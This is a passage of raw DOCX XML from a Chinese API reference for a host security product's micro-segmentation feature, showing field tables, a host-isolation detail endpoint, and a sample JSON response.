                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="57D948E1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A1D3EB9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EFC0784" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75B9114A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0C5BE67C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45CDC976" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02B69906" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="321936E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2B94747F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CA5CDC2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>updatedTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FD3537C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="293684E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6B96F843" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7945EDEC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AC56302" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51740956" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="078BA966" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19BF223F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remoteLoginEnabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="549180C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D058351" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>开启远程登录 0-关闭，1-开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4CE94479" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13EE61FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B31AF4E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C1F03FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="618DD381" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BF4B318" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIpBak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65877117" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="180A633D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>根据ip搜索的匹配ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6FF445D4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18F7EC7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A3804BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="521AF9F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3875712A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0927D2B3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groupName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57CADA18" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C1DA5FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="316F489D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C833014" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>onlineStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FD81E3F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="410D2C75" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>在线状态，0：离线，1：在线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0001C389" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15418D26" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ipList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ED0A3AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7523F884" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>放行ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5D6B20AC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EB721AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>portList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3293F1EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70B4A6AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>放行端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0FEBAD5F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71D160FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0882C971" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C76AD86" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务状态：1隔离中 2隔离成功 3隔离失败 4修改中 5修改失败 6解除中 7解除失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1EF31981" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F66D81F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="077E0976" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="093DB270" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作类型， micro_segmentation_add:新增， micro_segmentation_edit：修改 ，micro_segmentation_del：删除</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="23432FA1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F2620C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24C49E55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25FAD828" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>错误描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="526F8101" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6386F6B2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>direction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BB3083E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E501CD9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>隔离方向,in:入站，out：出站，all：全部</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1AB4EAD8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="216" w:name="查询隔离详情"/>
      <w:bookmarkEnd w:id="215"/>
      <w:r>
        <w:t>查询隔离详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A20E07" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4900E6CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/ms-srv/api/segmentation/detail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A33285"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954"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="841"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5990013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9D5EF50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F4A7F1D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17FB7E70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="262E4EC1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1989B84C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="048AFF7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6377F87C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C848EFB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="546DF62B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机Id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53700BEF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C869EE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/ms-srv/api/segmentation/detail?agentId=5fa27259dae9af8a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2389C30E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770CB518" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorDesc": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "data": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "id": "61d7b2de27b7b26916736511",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "agentId": "5fa27259dae9af8a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "comId": "513835545069574e666d",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "ipList": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "192.168.1.100",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "172.16.2.187"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "portList": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "80",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "81",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "82"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "protocol": "*",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "updatedTime": 1641525982,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "remark": "123456",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "operation": "micro_segmentation_add",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "status": 3,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "error": "主机离线",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "direction": "out"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8C3EB9"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484"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="7589"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4586496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84F135A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CA63CDD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3079A39B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5A80994F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BBBA573" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78C71839" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08F92EAF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="07664958" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12864C36" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4526654B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D08D87E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>状态码，0：成功，其他异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4928E616" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
